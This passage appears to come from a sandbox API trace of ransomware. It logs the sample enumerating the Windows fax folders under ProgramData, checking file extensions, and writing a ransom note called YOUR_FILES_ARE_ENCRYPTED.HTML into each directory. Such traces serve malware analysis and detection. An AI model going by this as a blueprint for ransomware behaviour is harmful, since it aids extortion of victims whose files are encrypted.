ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.422] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.422] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.422] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0157.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\activitylog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.423] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.425] CloseHandle (hObject=0x5a0) returned 1 [0157.426] GetProcessHeap () returned 0x270000 [0157.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.427] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x91817478, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0157.427] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0157.427] GetProcessHeap () returned 0x270000 [0157.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.427] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0157.427] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*" [0157.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x91817478, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.427] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x91817478, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.428] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.428] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 69 [0157.428] GetProcessHeap () returned 0x270000 [0157.428] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.428] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0157.428] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*" [0157.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.428] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.428] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x28aa, dwReserved0=0x0, dwReserved1=0x60, cFileName="confident.cov", cAlternateFileName="")) returned 1 [0157.428] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 83 [0157.428] lstrcmpW (lpString1="confident.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.428] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0157.428] lstrlenW (lpString=".cov") returned 4 [0157.428] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x2a09, dwReserved0=0x0, dwReserved1=0x60, cFileName="fyi.cov", cAlternateFileName="")) returned 1 [0157.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 77 [0157.429] lstrcmpW (lpString1="fyi.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.429] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0157.429] lstrlenW (lpString=".cov") returned 4 [0157.429] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x0, dwReserved1=0x60, cFileName="generic.cov", cAlternateFileName="")) returned 1 [0157.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 81 [0157.429] lstrcmpW (lpString1="generic.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.429] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0157.429] lstrlenW (lpString=".cov") returned 4 [0157.429] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x0, dwReserved1=0x60, cFileName="urgent.cov", cAlternateFileName="")) returned 1 [0157.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 80 [0157.429] lstrcmpW (lpString1="urgent.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.429] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0157.429] lstrlenW (lpString=".cov") returned 4 [0157.429] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x0, dwReserved1=0x60, cFileName="urgent.cov", cAlternateFileName="")) returned 0 [0157.429] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.430] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0157.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.430] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.433] CloseHandle (hObject=0x4a8) returned 1 [0157.433] GetProcessHeap () returned 0x270000 [0157.435] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.435] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.435] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.435] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0157.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.435] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.438] CloseHandle (hObject=0x5a0) returned 1 [0157.438] GetProcessHeap () returned 0x270000 [0157.440] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.440] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Inbox", cAlternateFileName="")) returned 1 [0157.440] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0157.440] GetProcessHeap () returned 0x270000 [0157.440] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.440] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" [0157.440] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*" [0157.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.440] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.440] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.440] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.441] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0157.441] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\inbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.441] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.444] CloseHandle (hObject=0x5a0) returned 1 [0157.444] GetProcessHeap () returned 0x270000 [0157.445] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.445] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Queue", cAlternateFileName="")) returned 1 [0157.445] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0157.445] GetProcessHeap () returned 0x270000 [0157.445] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.445] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" [0157.445] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*" [0157.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.446] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.446] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.446] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.446] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0157.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\queue\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.447] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.449] CloseHandle (hObject=0x5a0) returned 1 [0157.450] GetProcessHeap () returned 0x270000 [0157.451] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.451] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0157.451] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0157.451] GetProcessHeap () returned 0x270000 [0157.451] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.451] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" [0157.451] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*" [0157.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.451] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 